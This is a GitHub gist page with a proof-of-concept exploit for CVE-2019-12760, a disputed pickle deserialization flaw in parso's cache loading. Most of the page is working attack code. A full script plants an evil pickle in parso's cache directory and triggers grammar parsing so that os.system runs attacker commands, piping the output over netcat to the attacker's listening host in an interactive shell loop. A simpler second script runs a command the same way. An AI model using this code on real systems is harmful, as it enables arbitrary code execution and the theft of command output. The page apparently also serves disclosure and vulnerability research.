** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."
Last active
February 16, 2022 08:13
-
-
Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import parso | |
import pickle | |
import random | |
import shutil | |
import threading | |
from hashlib import sha256 | |
from os import makedirs, remove, system | |
from os.path import dirname, exists, join | |
from six import b, u | |
from subprocess import Popen, PIPE | |
from sys import version_info as v | |
from tinyscript import * | |
__author__ = "Alexandre D'Hondt" | |
__version__ = "1.0" | |
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)" | |
__doc__ = """ | |
This Proof-of-Concept exploit leverages cache loading of the parso library. | |
It requires the attacker to be able to create a folder and to write files on | |
the target. It guesses the path to a cache file, writes an evil pickled object | |
to it and, while triggering grammar loading, makes the vulnerable application | |
load the evil pickle to allow Arbitrary Code Execution. | |
""" | |
# ------------------------- FUNCTIONS TO BE CUSTOMIZED ------------------------- | |
def get_payload(command, lhost, lport): | |
# TODO: implement here the logic to send remote command result to attacker's | |
# host (i.e. if Netcat is not present on the remote server) | |
class PoC(object): | |
def __reduce__(self): | |
return (system, ("{} | nc -n {} {} -w 1" | |
.format(command, lhost, lport), )) | |
return pickle.dumps(PoC()) | |
def remove_from_target(host, port, abspath): | |
# TODO: implement here the logic to remove a file from the remote server | |
remove(abspath) | |
def trigger_grammar_processing(dummy_path, cache_path): | |
# TODO: implement here the logic to trigger grammar processing by parso on | |
# the remote server | |
g = parso.load_grammar() | |
try: | |
g.parse(path=dummy_path, cache=True, cache_path=cache_path) | |
except: | |
pass | |
def write_to_target(host, port, abspath, content=""): | |
# TODO: implement here the logic to write a file to the remote server | |
d = dirname(abspath) | |
if not exists(d): | |
makedirs(d) | |
with open(abspath, 'wb') as f: | |
f.write(b(content)) | |
logger.debug("> File written to '%s'" % abspath) | |
# ----------------------------- STATIC FUNCTIONS ------------------------------- | |
class Listener(object): | |
def __init__(self): | |
self.state = 1 | |
self.thread = threading.Thread(target=self.run) | |
self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True} | |
def run(self): | |
global args | |
last_lport = args.lport = 0 | |
while True: | |
if self.state == 0: | |
break | |
while args.lport == last_lport: | |
args.lport = random.randint(12345, 45678) | |
logger.debug("Starting new listener on port {}".format(args.lport)) | |
self.args = ("nc -nlvp {}".format(args.lport), ) | |
out, _ = Popen(*self.args, **self.kwargs).communicate() | |
try: | |
print(out.decode('utf-8')) | |
except: | |
print(u(str(out))) | |
last_lport = args.lport | |
def cache_filepath(cache_path, python_implem, dummy_path, version): | |
# we take the hash from the grammar on the local host, thus assuming it is | |
# the same as target's one given Python's version | |
_ = dirname(parso.__file__) | |
_ = join(_, "python", "grammar%s.txt" % version) | |
h = sha256(open(_).read().encode("utf-8")).hexdigest() | |
p = sha256(dummy_path.encode("utf-8")).hexdigest() | |
_ = "%s/%s-%s-%i/%s-%s.pkl" % (cache_path, python_implem, version, | |
parso.cache._PICKLE_VERSION, h, p) | |
logger.debug("> Cache path: %s" % _) | |
return _ | |
def start_shell(): | |
global args | |
logger.debug("Starting shell...") | |
h, p, l = args.rhost, args.rport, args.lhost | |
i, v, r = args.implem, args.python, args.rdir | |
listener = Listener() | |
listener.thread.start() | |
cnt = 0 | |
while True: | |
d = join(r, "dummy{}".format(cnt)) | |
write_to_target(h, p, d) | |
cpath = cache_filepath(r, i, d, v) | |
try: | |
cmd = raw_input("> ") | |
except: | |
cmd = input("> ") | |
cmd = cmd.strip() | |
if cmd == "": | |
continue | |
elif cmd in ["exit", "quit"]: | |
listener.state = 0 | |
logger.debug("Killing Netcat instances...") | |
Popen("killall -9 nc", shell=True) | |
logger.debug("Joining Netcat thread...") | |
listener.thread.join(1) | |
logger.debug("Removing artifacts...") | |
shutil.rmtree(args.rdir) | |
return | |
write_to_target(h, p, cpath, get_payload(cmd, l, args.lport)) | |
trigger_grammar_processing(d, r) | |
remove_from_target(h, p, cpath) | |
remove_from_target(h, p, d) | |
cnt += 1 | |
# -------------------------- SCRIPT'S EXECUTABLE PART -------------------------- | |
if __name__ == '__main__': | |
global args | |
target = parser.add_argument_group("Target options") | |
target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso", | |
help="cache absolute folder") | |
target.add_argument("-i", "--implem", default="CPython", | |
choices=["CPython", "IronPython", "Jython", "PyPy"], | |
help="platform Python's implementation") | |
target.add_argument("--rhost", default="127.0.0.1", | |
help="local host address") | |
target.add_argument("--rport", default=80, type=int, | |
help="local host port") | |
target.add_argument("-p", "--python", default="36", | |
help="Python major and minor version digits") | |
payload = parser.add_argument_group("Payload options") | |
payload.add_argument("--lhost", default="127.0.0.1", | |
help="local host address") | |
initialize() | |
start_shell() |
Simpler proof-of-concept script:
#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b
__author__ = "Alexandre D'Hondt"
print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
f.write(b(""))
print(" > %s" % dummy)
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
pyversion,
parso.cache._PICKLE_VERSION,
sha256(open(grammar).read().encode("utf-8")).hexdigest(),
sha256(dummy.encode("utf-8")).hexdigest()
)
print(" > %s" % cache)
d = dirname(cache)
if not exists(d):
makedirs(d)
print("\n3. Writing a evil cache file (with a pickle payload)...")
class PoC(object):
def __reduce__(self):
return (system, ("ls", ))
with open(cache, 'wb') as f:
f.write(pickle.dumps(PoC()))
print(" > done")
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
print("\nCommand's result:\n")
g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception as e:
pass
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
JFTR this was reported upstream via davidhalter/parso#75.
Thank you!